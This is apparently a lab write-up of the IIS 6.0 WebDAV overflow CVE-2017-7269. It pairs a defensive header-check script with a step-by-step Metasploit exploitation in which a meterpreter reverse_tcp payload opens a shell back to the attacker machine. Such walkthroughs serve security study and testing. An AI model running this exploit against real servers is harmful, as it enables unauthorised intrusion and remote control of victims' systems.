Vulnerability Description
A buffer overflow vulnerability exists in IIS 6.0 when the WebDAV service is enabled, and it can lead to remote code execution. For current IIS 6.0 users, the available workaround is to turn off the WebDAV service.
Vulnerability ID
CVE-2017-7269
Vulnerability level
High risk
Affected products
Microsoft Windows Server 2003 R2 running IIS 6.0 with the WebDAV service enabled
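To confirm that the workaround above has taken effect on a server you administer, the headers of an HTTP OPTIONS response can be checked for the IIS 6.0 banner and for WebDAV being advertised. The following is an added example, not code from the original post; the function names and sample headers are constructed for illustration, and it assumes that a server with WebDAV turned off no longer returns a DAV header or WebDAV verbs.

```python
import http.client

# Methods that only a WebDAV-enabled server advertises (RFC 4918).
WEBDAV_METHODS = {"PROPFIND", "PROPPATCH", "MKCOL", "COPY", "MOVE", "LOCK", "UNLOCK"}

def assess_options(headers):
    """Classify the headers of an HTTP OPTIONS response (name -> value)."""
    h = {k.lower(): v for k, v in headers.items()}
    server = h.get("server", "")
    advertised = {m.strip().upper()
                  for name in ("allow", "public")
                  for m in h.get(name, "").split(",") if m.strip()}
    # A DAV compliance header or any WebDAV verb means the extension is on.
    webdav = "dav" in h or bool(advertised & WEBDAV_METHODS)
    iis6 = server.lower().startswith("microsoft-iis/6.0")
    if iis6 and webdav:
        verdict = "exposed"              # affected product, WebDAV still enabled
    elif iis6:
        verdict = "workaround-applied"   # IIS 6.0 with WebDAV turned off
    else:
        # The Server banner can be removed or rewritten, so this is not proof
        # that the host is unaffected; confirm on the host itself.
        verdict = "not-identified-as-iis6"
    return {"server": server, "webdav": webdav, "verdict": verdict}

def fetch_options(host, port=80, timeout=5):
    """Send OPTIONS / to a server you administer and return its headers."""
    conn = http.client.HTTPConnection(host, port, timeout=timeout)
    try:
        conn.request("OPTIONS", "/")
        return dict(conn.getresponse().getheaders())
    finally:
        conn.close()

# Constructed sample responses (not captured from a real host).
SAMPLE_WEBDAV_ON = {
    "Server": "Microsoft-IIS/6.0",
    "DAV": "1, 2",
    "Allow": "OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK",
}
SAMPLE_WEBDAV_OFF = {
    "Server": "Microsoft-IIS/6.0",
    "Allow": "OPTIONS, TRACE, GET, HEAD, POST",
}

if __name__ == "__main__":
    for label, sample in (("on", SAMPLE_WEBDAV_ON), ("off", SAMPLE_WEBDAV_OFF)):
        print(label, assess_options(sample))
```

For a live check, pass the result of `fetch_options("your-server")` to `assess_options`.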
Building the vulnerable environment
My environment is Windows 2003 R2 Enterprise Edition. After installing IIS 6.0, open the service manager; in the manager, expand the extensions list, where there is a WebDAV option. This option is in the prohibited state by default; right-click it and select allow.
Then press Windows + R -> services.msc -> start the WebClient service to complete the configuration.
Vulnerability testing
Attacker machine: Kali, IP: 192.168.48.131
Victim machine: Windows 2003, IP: 192.168.48.146
Download the exploit: https://github.com/Al1ex/CVE-2017-7269
Copy the exploit into the /usr/share/metasploit-framework/modules/exploits/windows/iis directory.
msf > search cve-2017-7269
Matching Modules
================
Name                                                 Disclosure Date  Rank    Description
----                                                 ---------------  ----    -----------
exploit/windows/iis/cve-2017-7269                    2017-03-31       good    CVE-2017-7269 Microsoft IIS WebDav ScStoragePathFromUrl Overflow
exploit/windows/iis/iis_webdav_scstoragepathfromurl  2017-03-26       manual  Microsoft IIS WebDav ScStoragePathFromUrl Overflow
msf > use exploit/windows/iis/cve-2017-7269
msf exploit(windows/iis/cve-2017-7269) > show options
Module options (exploit/windows/iis/cve-2017-7269):
Name                Current Setting  Required  Description
----                ---------------  --------  -----------
HttpHost            localhost        yes       http host for target
PhysicalPathLength  19               yes       length of physical path for target(include backslash)
RHOST                                yes       The target address
RPORT               80               yes       The target port (TCP)
Exploit target:
Id  Name
--  ----
0   Microsoft Windows Server 2003 R2
msf exploit(windows/iis/cve-2017-7269) > set RHOST 192.168.48.146 // set the target's IP
RHOST => 192.168.48.146
msf exploit(windows/iis/cve-2017-7269) > set HttpHost 192.168.48.146 // set the target's website
HttpHost => 192.168.48.146
msf exploit(windows/iis/cve-2017-7269) > set payload windows/meterpreter/reverse_tcp // set the return payload
payload => windows/meterpreter/reverse_tcp
msf exploit(windows/iis/cve-2017-7269) > set LHOST 192.168.48.131 // set the local IP
LHOST => 192.168.48.131
msf exploit(windows/iis/cve-2017-7269) > exploit // overflow
[*] Started reverse TCP handler on 192.168.48.131:4444
[*] Sending stage (179779 bytes) to 192.168.48.146
[*] Meterpreter session 1 opened (192.168.48.131:4444 -> 192.168.48.146:1043) at 2018-01-24 22:49:23 +0800
meterpreter >